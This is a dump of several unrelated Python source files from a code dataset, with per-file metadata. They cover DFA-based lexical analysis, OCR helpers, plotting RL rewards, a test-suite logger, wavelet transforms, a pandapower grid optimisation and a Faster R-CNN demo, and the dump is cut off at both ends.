None\n\n\n def __init__(self, digitDFA_path):\n self.__digitDFA_path = digitDFA_path\n self.__digitDFA, self.__final_state = DFA_converter(self.__digitDFA_path).convert()\n\n def in_digitDFA(self, program_fraction):\n \"\"\"\n 判断输入的程序片段是不是能够被该自动机识别\n :param program_fraction: 该程序片段\n :return: Boolean, True——能够被识别\n False——不能够被识别\n \"\"\"\n state = 0 #state表示该自动机的状态\n is_float = False\n\n for i in range(len(program_fraction)):\n DFA_state = self.__digitDFA[state]\n ch = program_fraction[i]\n if ch == '.' or ch == 'e':\n is_float = True\n if isDigit(ch):\n if \"d\" in DFA_state:\n state = DFA_state.index(\"d\")\n else:\n error_masage = \"状态\" + str(state) + \"不能接受字符\" + ch\n return (False, error_masage)\n elif (ch == 'e' or ch == '.' or ch == '-'):\n if ch in DFA_state:\n state = DFA_state.index(ch)\n else:\n error_masage = \"状态\" + str(state) + \"不能接受字符\" + ch\n return (False, error_masage)\n else:\n error_masage = \"输入有不合法字符\"\n return (False, error_masage) #出现了不合法的字符\n\n\n if str(state) in self.__final_state:\n return (True, is_float)\n else:\n error_masage = \"自动机停止状态不再最终状态\"\n return (False,error_masage)\n\nclass CharDFA:\n __charDFA = None\n __final_state = None\n __charDFA_path = None\n\n def __init__(self, charDFA_path):\n self.__charDFA_path = charDFA_path\n self.__charDFA, self.__final_state = DFA_converter(self.__charDFA_path).convert()\n\n def in_charDFA(self, program_fraction):\n state = 0\n\n for i in range(len(program_fraction)):\n ch = program_fraction[i]\n DFA_state = self.__charDFA[state]\n\n if ch in DFA_state:\n state = DFA_state.index(ch)\n elif \"a\" in DFA_state:\n state = 2\n else:\n error_masage = \"状态\" + str(state) + \"不能接受字符\" + ch\n return (False, error_masage)\n\n if str(state) in self.__final_state:\n return (True, None)\n else:\n error_masage = \"自动机停止状态不再最终状态\"\n return (False, error_masage)\n\nclass StringDFA:\n __stringDFA = None\n __final_state = None\n __charDFA_path = None\n\n def __init__(self, stringDFA):\n self.__stringDFA = stringDFA\n self.__stringDFA, self.__final_state = DFA_converter(stringDFA_path).convert()\n\n def in_stringDFA(self, program_fraction):\n state = 0\n\n for i in range(len(program_fraction)):\n ch = program_fraction[i]\n DFA_state = self.__stringDFA[state]\n\n if ch in DFA_state:\n state = DFA_state.index(ch)\n elif \"a\" in DFA_state and ch != \"\\\"\":\n state = 1\n else:\n error_masage = \"状态\" + str(state) + \"不能接受字符\" + ch\n return (False, error_masage)\n\n if str(state) in self.__final_state:\n return (True, None)\n else:\n error_masage = \"自动机停止状态不再最终状态\"\n return (False, error_masage)\n\nclass CommentDFA:\n __commentDFA = None\n __final_state = None\n __commentDFA_path = None\n\n def __init__(self, commentDFA_path):\n self.__commentDFA_path = commentDFA_path\n self.__commentDFA, self.__final_state = DFA_converter(commentDFA_path).convert()\n\n def in_commentDFA(self, program_fraction):\n state = 0\n\n for i in range(len(program_fraction)):\n ch = program_fraction[i]\n DFA_state = self.__commentDFA[state]\n\n if ch in DFA_state and ch != \"c\" and ch != '#':\n state = DFA_state.index(ch)\n elif \"a\" in DFA_state and ch not in [\"/\", \"*\"]:\n state = DFA_state.index(\"a\")\n elif \"b\" in DFA_state and ch != \"/\" and ch != \"\\n\":\n state = DFA_state.index(\"b\")\n elif \"c\" in DFA_state and ch == \"\\n\":\n state = DFA_state.index(\"c\")\n else:\n error_masage = \"状态\" + str(state) + \"不能接受字符\" + ch\n return (False, error_masage)\n\n if str(state) in self.__final_state:\n return (True, None)\n else:\n error_masage = \"自动机停止状态不再最终状态\"\n return (False, error_masage)\n\nclass O_H_DFA:\n __O_H_DFA = None\n __O_H_DFA_path = None\n __final_state = None\n\n def __init__(self, O_H_state):\n self.__O_H_DFA_path = O_H_DFA_path\n self.__O_H_DFA, self.__final_state = DFA_converter(O_H_DFA_path).convert()\n\n def in_O_H_DFA(self, program_fraction):\n state = 0\n is_octal = False\n\n for i in range(len(program_fraction)):\n ch = program_fraction[i]\n DFA_state = self.__O_H_DFA[state]\n if state == 2:\n is_octal = True\n\n if ch in DFA_state:\n state = DFA_state.index(ch)\n elif \"a\" in DFA_state and ch >= \"1\" and ch <= \"7\":\n state = DFA_state.index(\"a\")\n elif \"b\" in DFA_state and ch >= \"0\" and ch <= \"7\":\n state = DFA_state.index(\"b\")\n elif \"c\" in DFA_state and ((ch >= \"1\" and ch <= \"9\") or (ch >= \"a\" and ch <= \"f\")):\n state = DFA_state.index(\"c\")\n elif \"d\" in DFA_state and ((ch >= \"0\" and ch <= \"9\") or (ch >= \"a\" and ch <= \"f\")):\n state = DFA_state.index(\"d\")\n else:\n error_masage = \"状态\" + str(state) + \"不能接受字符\" + ch\n return (False, error_masage, is_octal)\n\n if str(state) in self.__final_state:\n return (True, None ,is_octal)\n else:\n error_masage = \"自动机停止状态不再最终状态\"\n return (False, error_masage, is_octal)\n\ndigitDFA = DigitDFA(digitDFA_path)\ncharDFA = CharDFA(charDFA_path)\nstringDFA = StringDFA(stringDFA_path)\ncommentDFA = CommentDFA(commentDFA_path)\no_H_DFA = O_H_DFA(O_H_DFA_path)","sub_path":"Lab1_lexical_analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121756763","text":"import torch\n\nalphabet = 'ABEKMHOPCTYX' + '0123456789' + '-'\n\nmodel_parameters = {\n 'image_height': 32,\n 'number_input_channels': 1,\n 'number_class_symbols': len(alphabet),\n 'rnn_size': 64\n}\n\n\ndef preds_converter(converter, logits, len_images):\n preds_size = torch.IntTensor([logits.size(0)] * len_images)\n _, preds = logits.max(2)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n sim_preds = converter.decode(preds, preds_size, raw=False)\n return sim_preds, preds_size","sub_path":"project/cnd/ocr/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"525471415","text":"import matplotlib.pyplot as plt\nimport statistics\n#log_file = open('./move_by_v.txt', 'r')\n#log_file = open('./moving_target_no_early_stop_4f+d.txt', 'r')\nlog_file = open('./phys.txt','r')\nlog_file = open('./phys_bigger_queue.txt','r')\nline = log_file.readline()\nx = []\ny = []\naverage = []\nmedian = []\nt = 1000.0\nlast_t = []\ni = 0\navg_len = 0\nwhile line:\n while '[' not in line:\n line = log_file.readline()\n sections = line.split('[')\n info = sections[2][:-2].split()\n \n ep_nb = int(info[1])\n ep_len = int(info[3])\n avg_len += ep_len\n i += 1\n rew = float(info[5])\n\n if len(last_t) < t and ep_len > 1:\n #garbage=1\n x.append(ep_nb)\n last_t.append(rew)\n average.append(sum(last_t)/len(last_t))\n elif ep_len > 1:\n y.append(rew)\n x.append(ep_nb)\n last_t.pop(0)\n last_t.append(rew)\n average.append(sum(last_t)/t)\n# median.append(statistics.median(last_t))\n #except:\n # print\n line = log_file.readline()\nfig, ax = plt.subplots()\nprint('Last 1000 Reward: '+str(sum(last_t)/t))\nprint('Avg Len: '+str(float(avg_len)/float(i)))\n#ax.plot(x, y)\nax.plot(x,average)\n#ax.plot(x, median)\nax.set(xlabel='time', ylabel='dist moved to target')\nax.grid()\nplt.show()\n","sub_path":"ga3c-airsim/graph_results.py","file_name":"graph_results.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445947633","text":"#!/usr/bin/env python\n\n\"\"\"\nCOSMO TECHNICAL TESTSUITE\n\nThis module implements a logger class which handles messages from the testsuite\nto the user. It is based on the standard Python logger class. The following logging\nlevels are supported: DEBUG, INFO, WARNING, ERROR\n\"\"\"\n\n# built-in modules\nimport sys, string\nimport logging as LG\n\n# private modules\nfrom ts_utilities import status_str, pretty_status_str\n\n# information\n__author__ = \"Oliver Fuhrer\"\n__email__ = \"cosmo-wg6@cosmo.org\"\n__maintainer__ = \"xavier.lapillonne@meteoswiss.ch\"\n\n\n# status column length\nSTAT_COLUMN = 12\n\n# logging levels\nDEBUG = LG.DEBUG # 10\nINFO = LG.INFO # 20\nWARNING = LG.WARNING # 30\nCHCKINFO = 35 # 35\nIMPORTANT = 35 # 35\nERROR = LG.ERROR # 40\n\n# formatting\nFORMAT = {\n DEBUG : \" \"*(STAT_COLUMN+2-7) + \"[ DBG ] %(msg)s\",\n INFO : \"%(msg)s\",\n WARNING : \"*** WARNING: %(msg)s\",\n CHCKINFO : \"%(msg)s\",\n IMPORTANT : \"%(msg)s\",\n ERROR : \"*** ERROR: %(msg)s\"\n}\n\n\nclass MyFormatter(LG.Formatter):\n \"\"\"Custom formatter which allows different formatting for different levels\"\"\"\n \n def __init__(self, fmt=\"%(levelno)s: %(msg)s\"):\n #super(MyFormatter,self).__init__(fmt)\n LG.Formatter.__init__(self, fmt)\n\n def format(self, record):\n\n # Save the original format configured by the user\n # when the logger formatter was instantiated\n format_orig = self._fmt\n\n # Replace the original format with one customized by logging level\n self._fmt = FORMAT.get(record.levelno)\n\n # Call the original formatter class to do the grunt work\n #result = super(MyFormatter, self).format(record)\n result = LG.Formatter.format(self, record)\n\n # Restore the original format configured by the user\n self._fmt = format_orig\n\n return result\n\n\nclass Logger:\n \"\"\"simple logger which is used throughout the testsuite\"\"\"\n\n def __init__(self, filename, append=False, color=False):\n self.filename = filename\n if append:\n self.mode = 'a'\n else:\n self.mode = 'w'\n self.logger = LG.getLogger('testsuite')\n if filename:\n self.handler = LG.FileHandler(filename,mode=self.mode,delay=False)\n else:\n self.handler = LG.StreamHandler(sys.stdout)\n self.formatter = MyFormatter()\n self.handler.setFormatter(self.formatter)\n self.logger.addHandler(self.handler)\n self.logger.setLevel(INFO)\n self.color = color\n \n def __del__(self):\n LG.shutdown()\n \n def setLevel(self, lvl):\n self.logger.setLevel(lvl)\n \n def getLevel(self):\n return self.logger.getEffectiveLevel(lvl)\n\n def log(self, lvl, msg, *args, **kwargs):\n self.logger.log(lvl, msg, *args, **kwargs)\n \n def debug(self, msg, *args, **kwargs):\n self.log(DEBUG, msg, *args, **kwargs)\n \n def info(self, msg, *args, **kwargs):\n prefix = ' '*(STAT_COLUMN+2) + ' '\n self.log(INFO, prefix + msg, *args, **kwargs)\n \n def warning(self, msg, *args, **kwargs):\n self.log(WARNING, msg, *args, **kwargs)\n\n def chckinfo(self, msg, *args, **kwargs):\n prefix = ' '*(STAT_COLUMN+4) + ' '\n self.log(CHCKINFO, prefix + msg, *args, **kwargs)\n \n def important(self, msg, *args, **kwargs):\n prefix = '[' + '-'*STAT_COLUMN + '] '\n self.log(IMPORTANT, prefix + msg, *args, **kwargs)\n \n def result(self, indent, status, msg, *args, **kwargs):\n slen = len(status_str(status))\n status = pretty_status_str(status, self.color, indent==0)\n pad = STAT_COLUMN - slen - 2*indent\n prefix=' '*(2*indent) + '[' + ' '*(pad//2) + status + ' '*(pad-pad//2) + '] '\n self.log(IMPORTANT, prefix + msg, *args, **kwargs)\n \n def error(self, msg, *args, **kwargs):\n self.log(ERROR, msg, *args, **kwargs)\n \n def flush(self):\n self.handler.flush()\n\n","sub_path":"tools/ts_logger.py","file_name":"ts_logger.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"288199144","text":"from random import randint\ngame = True\nround = True\nwhile game == True:\n\tboard = []\n\tfor i in range(10):\n\t\tboard.append(\"~~~~~~~~~~\")\n\n\tdef printboard():\n\t\tfor row in board:\n\t\t\tprint(row)\n\n\t'''\n\tclass Ship():\n\t\tx = None\n\t\ty = None\n\t\tdef __init__(self, x, y):\n\t\t\tself.x = x\n\t\t\tself.y = y\n\n\tdef make_ship(x, y):\n\t\tship = Ship(x, y)\n\t\treturn ship\n\n\ts1 = make_ship(randint(0, 11), randint(0, 11))\n\t'''\n\n\tshots = []\n\twhile round == True:\n\t\tshot = input(\"where to shoot (x, y): \")\n\t\tshots.append(shot)\n\t\tgame = False\n\t\tround = False\n","sub_path":"programmeerimine/py/battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284008468","text":"import math\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom torch.autograd import Variable\r\nimport models.modules.module_util as mutil\r\nimport functools\r\n\r\ndef default_conv(in_channels, out_channels, kernel_size, bias=True, dilation=1, use_snorm=False):\r\n if use_snorm:\r\n return nn.utils.spectral_norm(nn.Conv2d(\r\n in_channels, out_channels, kernel_size,\r\n padding=(kernel_size//2)+dilation-1, bias=bias, dilation=dilation))\r\n else:\r\n return nn.Conv2d(\r\n in_channels, out_channels, kernel_size,\r\n padding=(kernel_size//2)+dilation-1, bias=bias, dilation=dilation)\r\n\r\ndef dwt_init(x):\r\n\r\n x01 = x[:, :, 0::2, :] / 2\r\n x02 = x[:, :, 1::2, :] / 2\r\n x1 = x01[:, :, :, 0::2]\r\n x2 = x02[:, :, :, 0::2]\r\n x3 = x01[:, :, :, 1::2]\r\n x4 = x02[:, :, :, 1::2]\r\n x_LL = x1 + x2 + x3 + x4\r\n x_HL = -x1 - x2 + x3 + x4\r\n x_LH = -x1 + x2 - x3 + x4\r\n x_HH = x1 - x2 - x3 + x4\r\n\r\n return torch.cat((x_LL, x_HL, x_LH, x_HH), 1)\r\n\r\ndef iwt_init(x):\r\n r = 2\r\n in_batch, in_channel, in_height, in_width = x.size()\r\n #print([in_batch, in_channel, in_height, in_width])\r\n out_batch, out_channel, out_height, out_width = in_batch, int(\r\n in_channel / (r ** 2)), r * in_height, r * in_width\r\n x1 = x[:, 0:out_channel, :, :] / 2\r\n x2 = x[:, out_channel:out_channel * 2, :, :] / 2\r\n x3 = x[:, out_channel * 2:out_channel * 3, :, :] / 2\r\n x4 = x[:, out_channel * 3:out_channel * 4, :, :] / 2\r\n\r\n\r\n h = torch.zeros([out_batch, out_channel, out_height, out_width]).float().cuda()\r\n\r\n h[:, :, 0::2, 0::2] = x1 - x2 - x3 + x4\r\n h[:, :, 1::2, 0::2] = x1 - x2 + x3 - x4\r\n h[:, :, 0::2, 1::2] = x1 + x2 - x3 - x4\r\n h[:, :, 1::2, 1::2] = x1 + x2 + x3 + x4\r\n\r\n return h\r\n\r\nclass DWT(nn.Module):\r\n def __init__(self):\r\n super(DWT, self).__init__()\r\n self.requires_grad = False\r\n\r\n def forward(self, x):\r\n return dwt_init(x)\r\n\r\nclass IWT(nn.Module):\r\n def __init__(self):\r\n super(IWT, self).__init__()\r\n self.requires_grad = False\r\n\r\n def forward(self, x):\r\n return iwt_init(x)\r\n","sub_path":"codes/models/modules/Wavelet.py","file_name":"Wavelet.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497396589","text":"from boltons.formatutils import DeferredValue, get_format_args\nimport sys\n\nast = \"-\"*8\nprint(ast, \"DeferredValue\", ast)\ndv = DeferredValue(lambda: len(sys._current_frames()))\noutput = \"works great in all {0} threads!\".format(dv)\nprint(dv)\nprint(output)\n\n","sub_path":"Modules/boltons_module/formatutils.py","file_name":"formatutils.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"582449162","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 3 15:07:11 2020\n\n@author: Caner\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport os\nimport pandas as pd\nimport pandapower as pp\nimport matplotlib.pyplot as plt\nimport pandapower.toolbox as tb\nfrom pandapower.plotting import simple_plot, simple_plotly, pf_res_plotly\nimport tempfile\nimport numpy as np\nfrom pandapower.timeseries.data_sources.frame_data import DFData\nfrom pandapower.timeseries.output_writer import OutputWriter\nfrom pandapower.timeseries.run_time_series import run_timeseries\nfrom pandapower.control.controller.const_control import ConstControl\n\nsimulators_dir = r'C:\\Users\\Caner\\Desktop\\Multi-Energy-Systems-Thesis-Project\\Co_simulation\\Case 2'\n\ndef grid_net():\n \n net = pp.create_empty_network()\n \n min_vm_pu = 0.98\n max_vm_pu = 1.02\n \n Pmin_p2g=0\n Pmax_p2g=50\n Pmin_p2h=0\n Pmax_p2h=50\n Pmin_extgrid=-0.1\n Pmax_extgrid=0.1\n Pmax_WF = 100\n Pmax_PV = 100\n Pmin_PV = 0\n Pmin_WF = 0\n\n \n #create buses\n bus1 = pp.create_bus(net, vn_kv=220., min_vm_pu=min_vm_pu, max_vm_pu=max_vm_pu, name ='Bus 0')\n bus2 = pp.create_bus(net, vn_kv=110., min_vm_pu=min_vm_pu, max_vm_pu=max_vm_pu, name ='Bus 1')\n bus3 = pp.create_bus(net, vn_kv=110., min_vm_pu=min_vm_pu, max_vm_pu=max_vm_pu, name ='Bus 2')\n \n #create 220/110 kV transformer\n pp.create_transformer(net, bus1, bus2, std_type=\"100 MVA 220/110 kV\", max_loading_percent=100, parallel=1)\n #pp.create_transformer_from_parameters(net, bus1, bus2, sn_mva=20, vn_hv_kv=110, vn_lv_kv=33, vkr_percent=1, vk_percent=1, pfe_kw=1, i0_percent=1, shift_degree=0, tap_phase_shifter=False, in_service=True, name='Trafo', index=None, max_loading_percent=90, parallel=1, df=1.0)\n \n \n #create 110 kV lines\n pp.create_line(net, bus2, bus3, length_km=10., std_type='NAYY 4x120 SE', max_loading_percent=100)\n \n #create loads\n l1 = pp.create_load(net, bus3, p_mw=50, q_mvar=0, sn_mva=55, min_p_mw=Pmin_p2g,max_p_mw=Pmax_p2g, max_q_mvar=10, min_q_mvar=-10, scaling=1.0, in_service=True, controllable=False,name='Power2Gas',)\n l2 = pp.create_load(net, bus3, p_mw=50, q_mvar=0, sn_mva=55, min_p_mw=Pmin_p2h,max_p_mw=Pmax_p2h, max_q_mvar=10, min_q_mvar=-10, scaling=1.0, in_service=True, controllable=False,name='Power2Heat',)\n l3 = pp.create_load(net, bus3, p_mw=10, q_mvar=0, sn_mva=200, min_p_mw=0,max_p_mw=200, max_q_mvar=50, min_q_mvar=-50, scaling=1.0, in_service=True, controllable=True,name='Electrical')\n l4 = pp.create_load(net, bus3, p_mw=20, q_mvar=0, sn_mva=20, min_p_mw=0,max_p_mw=20, max_q_mvar=20, min_q_mvar=-20, scaling=1.0, in_service=True, controllable=False,name='Electrical_base')\n \n #create generators\n eg = pp.create_ext_grid(net, bus1,vm_pu=1.0, va_degree=0,min_p_mw=Pmin_extgrid, max_p_mw=Pmax_extgrid, name='external_grid')\n g0 = pp.create_sgen (net, bus3, p_mw=56, q_mvar=0, sn_mva=110, name='WF', max_q_mvar=80, min_q_mvar=-80, min_p_mw=Pmin_WF, max_p_mw=Pmax_WF, scaling=1.0, type=None, controllable=False, in_service=True)\n g1 = pp.create_sgen(net, bus3, p_mw=0, q_mvar=0, sn_mva=110, name='PV', max_q_mvar=80, min_q_mvar=-80, min_p_mw=Pmin_PV, max_p_mw=Pmax_PV, scaling=1.0, type=None, controllable=False, in_service=True)\n g2 = pp.create_sgen(net, bus3, p_mw=30, q_mvar=0, sn_mva=200, name='grid', max_q_mvar=80, min_q_mvar=-80, min_p_mw=0, max_p_mw=220, scaling=1.0, type=None, controllable=True, in_service=True)\n \n pp.create_poly_cost(net, 0, 'load', cp1_eur_per_mw=-14)\n pp.create_poly_cost(net, 1, 'load', cp1_eur_per_mw=-12)\n pp.create_poly_cost(net, 2, 'load', cp1_eur_per_mw=-3)\n #pp.create_poly_cost(net,0,'ext_grid',cp1_eur_per_mw=20) \n pp.create_poly_cost(net, 0, 'sgen', cp1_eur_per_mw=-1)\n pp.create_poly_cost(net, 1, 'sgen', cp1_eur_per_mw=-1)\n pp.create_poly_cost(net, 2, 'sgen', cp1_eur_per_mw=2)\n \n pp.runopp(net, calculate_voltage_angles=False, verbose=True)\n return net\n\nnet = grid_net()\n\n #costeg = pp.create_poly_cost(net, 0, 'ext_grid', cp1_eur_per_mw=10)\n #costgen1 = pp.create_poly_cost(net, 0, 'gen', cp1_eur_per_mw=10)\n #costgen2 = pp.create_poly_cost(net, 1, 'gen', cp1_eur_per_mw=10)\n \n #Maximizing Generation\n#pp.create_poly_cost(net,0,'ext_grid',cp1_eur_per_mw=20) \n\n#pp.create_pwl_cost(net, 1, \"sgen\", [[net.sgen.min_p_mw.at[0], net.sgen.max_p_mw.at[0], -1]])\n\n#pp.create_pwl_cost(net, 0, \"sgen\", [[net.sgen.min_p_mw.at[0], net.sgen.max_p_mw.at[0], -1]])\n \n #Minimizing Load\n#pp.create_poly_cost(net, 0, 'load', cp1_eur_per_mw=1)\n#pp.create_poly_cost(net, 1, 'load', cp1_eur_per_mw=-14)\n\n\n#pp.create_poly_cost(net, 2, 'load', cp1_eur_per_mw=-2)\n #pp.create_pwl_cost(net, 0, \"load\", [[net.load.min_p_mw.at[0], net.load.max_p_mw.at[0], 1]])\n #pp.create_poly_cost(net, 0, 'storage', cp1_eur_per_mw=1)\n #pp.create_pwl_cost(net, 0, \"storage\", [[net.storage.min_p_mw.at[0], net.storage.max_p_mw.at[0], 1]])\n\n#pp.runopp(net, calculate_voltage_angles=False, verbose=True)\n#pp.runpp(net)\n#if __name__ == \"__main__\":\n# pp.diagnostic(net)\n\n#df = pd.read_excel(\"multi_timeseries.xlsx\",index_col=0)\n#ds = DFData(df)\n#ConstControl(net, 'sgen',\"max_p_mw\", element_index=net.sgen.index, data_source=ds, profile_name=[\"Wind\",\"PV\"])\n\n#ow = OutputWriter(net, time_steps=None, output_path=\"./results/\", output_file_type=\".xlsx\")\n#ow.log_variable(\"res_sgen\",\"p_mw\")\n#ow.log_variable(\"res_line\",\"loading_percent\")\n# starting the timeseries simulation \n#run_timeseries(net, time_steps=None)\n\n#Results\n#df = pd.read_excel(\"./results/res_sgen/max_p_mw.xlsx\",index_col=0)\n#df.plot()\n#plt.show()\n\n\n\n\n\n# save as pickle\npp.to_pickle(net, os.path.join(simulators_dir, 'gridModel_case2.p')) # absolute path\n\nprint(net.res_bus)\nprint(net.res_sgen)\nprint(net.res_load)\nprint(net.res_ext_grid)\nprint(net.res_line)\n\n#simple_plot(net)\n","sub_path":"Co_simulation/Base_case1/grid_basecase.py","file_name":"grid_basecase.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"231728716","text":"from __future__ import print_function\nimport argparse\nimport os\nimport cv2\nimport json\nimport mxnet as mx\nimport numpy as np\nfrom rcnn.config import config\nimport rcnn.symbol\nfrom rcnn.io.image import resize, transform\nfrom rcnn.core.tester import Predictor, im_detect, im_proposal, vis_all_detection, draw_all_detection\nfrom rcnn.utils.load_model import load_param\nfrom rcnn.processing.nms import py_nms_wrapper, cpu_nms_wrapper, gpu_nms_wrapper\n\n\nCLASSES = ('__background__',\n 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair',\n 'cow', 'diningtable', 'dog', 'horse',\n 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor')\n\nconfig.TEST.HAS_RPN = True\nSHORT_SIDE = config.SCALES[0][0]\nLONG_SIDE = config.SCALES[0][1]\nPIXEL_MEANS = config.PIXEL_MEANS\nDATA_NAMES = ['data', 'im_info']\nLABEL_NAMES = None\nDATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\nLABEL_SHAPES = None\n# visualization\nCONF_THRESH = 0.7\nNMS_THRESH = 0.3\nnms = py_nms_wrapper(NMS_THRESH)\n\n\ndef get_net(symbol, prefix, epoch, ctx):\n arg_params, aux_params = load_param(\n prefix, epoch, convert=True, ctx=ctx, process=True)\n\n # infer shape\n data_shape_dict = dict(DATA_SHAPES)\n print('DATA_SHAPES:',DATA_SHAPES)\n arg_names, aux_names = symbol.list_arguments(), symbol.list_auxiliary_states()\n arg_shape, _, aux_shape = symbol.infer_shape(**data_shape_dict)\n arg_shape_dict = dict(zip(arg_names, arg_shape))\n aux_shape_dict = dict(zip(aux_names, aux_shape))\n\n # check shapes\n for k in symbol.list_arguments():\n if k in data_shape_dict or 'label' in k:\n continue\n assert k in arg_params, k + ' not initialized'\n assert arg_params[k].shape == arg_shape_dict[k], \\\n 'shape inconsistent for ' + k + ' inferred ' + \\\n str(arg_shape_dict[k]) + ' provided ' + str(arg_params[k].shape)\n for k in symbol.list_auxiliary_states():\n assert k in aux_params, k + ' not initialized'\n assert aux_params[k].shape == aux_shape_dict[k], \\\n 'shape inconsistent for ' + k + ' inferred ' + \\\n str(aux_shape_dict[k]) + ' provided ' + str(aux_params[k].shape)\n\n predictor = Predictor(symbol, DATA_NAMES, LABEL_NAMES, context=ctx,\n provide_data=DATA_SHAPES, provide_label=LABEL_SHAPES,\n arg_params=arg_params, aux_params=aux_params)\n return predictor\n\n\ndef generate_batch(im):\n \"\"\"\n preprocess image, return batch\n :param im: cv2.imread returns [height, width, channel] in BGR\n :return:\n data_batch: MXNet input batch\n data_names: names in data_batch\n im_scale: float number\n \"\"\"\n im_array, im_scale = resize(im, SHORT_SIDE, LONG_SIDE)\n im_array = transform(im_array, PIXEL_MEANS)\n im_info = np.array(\n [[im_array.shape[2], im_array.shape[3], im_scale]], dtype=np.float32)\n data = [mx.nd.array(im_array), mx.nd.array(im_info)]\n data_shapes = [('data', im_array.shape), ('im_info', im_info.shape)]\n data_batch = mx.io.DataBatch(\n data=data, label=None, provide_data=data_shapes, provide_label=None)\n return data_batch, DATA_NAMES, im_scale\n\n\ndef demo_net(predictor, image_name, vis=False, save_dir='./', save_name='tmp.jpg', threshold=0.7):\n \"\"\"\n generate data_batch -> im_detect -> post process\n :param predictor: Predictor\n :param image_name: image name\n :param vis: will save as a new image if not visualized\n :return: None\n \"\"\"\n assert os.path.exists(image_name), image_name + ' not found'\n result_lst = list()\n try:\n im = cv2.imread(image_name)\n data_batch, data_names, im_scale = generate_batch(im)\n scores, boxes, data_dict = im_detect(\n predictor, data_batch, data_names, im_scale)\n\n all_boxes = [[] for _ in CLASSES]\n for cls in CLASSES:\n cls_ind = CLASSES.index(cls)\n cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]\n cls_scores = scores[:, cls_ind, np.newaxis]\n keep = np.where(cls_scores >= threshold)[0]\n dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]\n keep = nms(dets)\n all_boxes[cls_ind] = dets[keep, :]\n\n boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]\n\n except:\n print('detection error')\n return None\n\n # print results\n print('class ---- [[x1, y1, x2, y2, confidence]]')\n for ind, boxes in enumerate(boxes_this_image):\n if len(boxes) > 0:\n print('---------', CLASSES[ind], '---------')\n print(boxes)\n for box in boxes:\n tmp_box = [round(x, 6) for x in box.tolist()[:]]\n tmp_box.append(str(CLASSES[ind]))\n result_lst.append(tmp_box)\n if vis:\n vis_all_detection(data_dict['data'].asnumpy(),\n boxes_this_image, CLASSES, im_scale)\n else:\n # result_dir = os.path.dirname(image_name)\n # result_file = save_dir + os.path.basename(image_name)\n result_file = save_dir + save_name\n print('results saved to %s' % result_file)\n im = draw_all_detection(\n data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)\n if not os.path.exists(os.path.dirname(result_file)):\n os.system('mkdir -p '+os.path.dirname(result_file))\n cv2.imwrite(result_file, im)\n\n return result_lst\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Demonstrate a Faster R-CNN network')\n parser.add_argument('--network', help='custom network architecture', default='resnet', type=str)\n parser.add_argument('--labellist', help='custom label list', type=str)\n parser.add_argument('--image', help='custom image', type=str)\n parser.add_argument('--imagelist', help='custom image list', type=str)\n parser.add_argument('--imageprefix', help='custom image prefix', type=str)\n parser.add_argument('--savedir', help='custom saving directory', type=str)\n parser.add_argument('--prefix', help='saved model prefix', type=str)\n parser.add_argument('--epoch', help='epoch of pretrained model', type=int)\n parser.add_argument('--longside', help='max long side of resized image', default=1500, type=int)\n parser.add_argument('--shortside', help='short side of resized image', default=800, type=int)\n parser.add_argument('--threshold', help='score threshold', default=CONF_THRESH, type=float)\n parser.add_argument('--gpu', help='GPU device to use', default=0, type=int)\n parser.add_argument('--vis', help='display result', action='store_true')\n parser.add_argument('--test', help='single image test mode', action='store_true')\n parser.add_argument('--save_json', help='path to result json file', default='./tmp.json', type=str)\n args = parser.parse_args()\n return args\n\n\ndef main(args):\n global CLASSES, DATA_SHAPES, SHORT_SIDE, LONG_SIDE\n SHORT_SIDE, LONG_SIDE = args.shortside, args.longside\n DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\n # args = parse_args()\n ctx = mx.gpu(args.gpu)\n CLASSES = ['__background__']\n with open(args.labellist, 'r') as label_list:\n for label in label_list:\n CLASSES.append(label.strip())\n SHORT_SIDE, LONG_SIDE = args.shortside, args.longside\n DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\n # print(CLASSES)\n # symbol = eval('rcnn.symbol.get_' + args.network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)\n symbol = eval('rcnn.symbol.get_' + args.network + '_test')(num_classes=len(CLASSES), num_anchors=config.NUM_ANCHORS)\n # symbol.save('demo.py.json')\n # symbol = rcnn.symbol.get_resnet_test(\n # num_classes=len(CLASSES), num_anchors=config.NUM_ANCHORS)\n predictor = get_net(symbol, args.prefix, args.epoch, ctx)\n lst_img = open(args.imagelist, 'r')\n 